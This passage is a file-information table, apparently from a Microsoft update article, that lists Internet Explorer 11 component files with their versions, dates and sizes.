13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 21:28| 320,000 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:05| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:47| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 18:59| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:22| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 4:46| 427,520 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 17:52| 292,864 \ninstall.ins| Not versioned| 13-Aug-2021| 17:53| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:02| 548,864 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 107,008 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 19:34| 23,552 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:02| 62,464 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.17416| 30-Oct-2014| 19:52| 495,616 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 21:19| 726,016 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 39,936 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 364,032 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 17:58| 221,696 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:50| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:20| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:17| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20045| 4-Jun-2021| 21:17| 175,616 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 17:44| 10,948,608 \nF12Tools.dll| 11.0.9600.20045| 4-Jun-2021| 21:16| 263,680 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:08| 1,186,304 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 587,776 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:51| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:43| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:34| 43,520 \nmsfeedssync.exe| 11.0.9600.16384| 21-Aug-2013| 20:05| 11,776 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 73,216 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 19:15| 16,228,864 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 1:36| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:39| 3,228 \nIEAdvpack.dll| 11.0.9600.16384| 21-Aug-2013| 19:54| 98,816 \nieetwcollector.exe| 11.0.9600.18658| 5-Apr-2017| 10:29| 98,816 \nieetwproxystub.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 43,008 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 1:36| 4,096 \nielowutil.exe| 11.0.9600.17031| 22-Feb-2014| 1:32| 222,208 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 308,224 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:11| 268,800 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 34,816 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.16518| 6-Feb-2014| 1:12| 112,128 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 20:15| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 457,216 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 574,976 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 1,935,360 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:22| 60,928 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,105,408 \noccache.dll| 11.0.9600.19867| 12-Oct-2020| 21:01| 121,856 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \nwebcheck.dll| 11.0.9600.19867| 12-Oct-2020| 20:57| 201,216 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \npdm.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 420,752 \nmsdbg2.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 295,320 \npdmproxy100.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 76,712 \nmsrating.dll| 11.0.9600.17905| 15-Jun-2015| 12:46| 157,184 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 20:45| 2,186,240 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 17:52| 678,400 \niernonce.dll| 11.0.9600.16518| 6-Feb-2014| 1:15| 28,160 \niesetup.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 59,904 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:46| 16,303 \ninseng.dll| 11.0.9600.16384| 21-Aug-2013| 19:35| 77,312 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:28| 87,552 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:02| 155,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 130,048 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:09| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 734,720 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 19:49| 236,032 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:03| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:48| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:50| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:10| 12,315,136 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:38| 24,486 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 18:45| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 503,909 